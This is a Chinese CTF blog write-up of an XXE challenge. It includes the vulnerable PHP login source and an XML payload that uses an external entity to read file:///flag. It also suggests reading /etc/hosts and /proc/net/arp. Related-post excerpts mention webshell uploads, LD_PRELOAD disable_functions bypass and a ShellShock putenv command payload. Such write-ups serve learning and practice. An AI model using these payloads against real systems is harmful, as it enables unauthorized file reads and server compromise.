xxe

发表于2022-12-06|更新于2022-12-06|web

|浏览量:

XXE

发现输入的 username 被 alert 了
查源码

1	onclick = "XMLFunction()";

在这里插入图片描述抓包看 xml 格式
回来看控制台
发现 js 的 xml 应用

<script type="text/javascript">
        function XMLFunction(){
            var xml = '' +
                '<?xml version="1.0" encoding="UTF-8"?>' +
            '<root>' +
            ' <username>' + $('#username').val() + '</username>' +
            ' <password>' + $('#password').val() + '</password>' +
            ' </root>';
            var xmlhttp = new XMLHttpRequest();
            xmlhttp.onreadystatechange = function () {
                if(xmlhttp.readyState == 4){
                    console.log(xmlhttp.readyState);
                    console.log(xmlhttp.responseText);
                    alert(xmlhttp.responseText);

                }
            }
            xmlhttp.open("POST","login.php",true);
            xmlhttp.send(xml);
        };
    </script>

构造 xxe 攻击
在这里插入图片描述这是 post 包传的时候记得把注释删去

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY flag SYSTEM "file:///flag"><!--构造实体-->
]>
<root>
<username>&flag;</username><!--输出flag实体-->
<password>2333</password>
</root>

flag{6866a844-3788-4a9d-9909-1d9d9943f56f}

在这里插入图片描述

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

有 admin 密码了也没用
藏内网了，上次比赛 ssrf 题出过

etc/hosts
proc/net/arp

xxe

https://s1rius.space/2022/12/XXE/

作者

s1rius

发布于

2022-12-06

更新于

2022-12-06

许可协议

CC BY-NC-SA 4.0

赞助

wechat
alipay

相关推荐

web我太喜欢 bilibili 大学啦–中北大学打开就一个 phpinfo直接搜 flag 直出虽然我是中北大学的，但这不是我们实验室出的题略感离谱签到-吉林警察学院打开有行注释以为拿来当用户名密码登录就完了来结果只有个登录成功假签到题尝试使用其他用户名（规律：用户名=密码）发现学号改一下会出现字符再试试还有开始爆破burp 先设置最后一位为变量从 1 爆到 9然后再设置两位为变量从 10 开始往后爆最后手打的 flag懒得写脚本了（为了个签到题写脚本不太划算） easy_upload-云南警官学院传个一句话 mua 写的图片 🐎进去发现不行试了半天把 ContentType 改成 png传进去了然后 🐜🗡 连一下找 flag在/home/ctf/flag 302 与深大-深圳大学进去提示 302 重定向burp 抓包然后让 get 和 post 传参进去最后改cookie: admin=trueflag get√ 我太喜欢 bilibili 大学啦修复版-中北大学打开又是 phpinfo看题目描述找 hint于是搜索...

工具彩蛋一开始的想法是工具一共有 8 页，想抓个包改下看看有没有第九页抓包后发现不管哪一页 limit 都是 12 但 offset 在变化于是这样设置参数在长度为 1000 到 6、7 千左右随便一个双击后点击响应看响应包在最后一行首页彩蛋api中间框内隐藏着两行字ctfhub{c18732f48a96c40d40a06e74b1305706} 题目入口彩蛋在 web-ssrf 中间那一列的某些题传参错误时会出现详情见ctfhub-ssrfpost 最后一行介绍公众号公众号彩蛋坑的一批！首先要先绑定然后点彩蛋它提示要回复正确的关键词我*#@%我回复过彩蛋关键词 egg ctfhub CTFHub 拿来把你 CTFer 自己人 …… 到底没想到竟然是 flag 投稿提交彩蛋只找到了前半部分分别在题目提交和 wp 提交页面的最后 1234ctfhub{029e02eb3a1 e8c49b1132b5 15b652a5f3a8 62013} 最后这个彩蛋剩余部分也没找到网上搜了下才明白：感谢 anweilx...

Bypass disable_function

LD_PRELOAD时间紧于是先采用最省时的方法先蚁剑连发现打不开 flag 文件要使用蚁剑插件绕过disabled function 如果蚁剑插件市场打不开的话可以去 github 搜github 上有说明按着他的安连上之后在蚁剑主页面右键 webshell 使用该插件按照步骤操作成功后把 webshell 地址改为 http://……/.antproxy.php在连上就能 tac 了tac /flag ShellShock进去发现连不上查了下大佬博客说是环境不正常原理如下如果环境变量的值以字符() {开头，那么这个变量就会被当作是一个导入函数的定义（Export），这种定义只有在 shell 启动的时候才生效。脚本 123456<?php$cmd = " tac /flag>/var/www/html/1.txt";putenv("PHP_DMIND=() { :; };$cmd");error_log("dmind",1);echo...

评论

数据加载中

数据加载中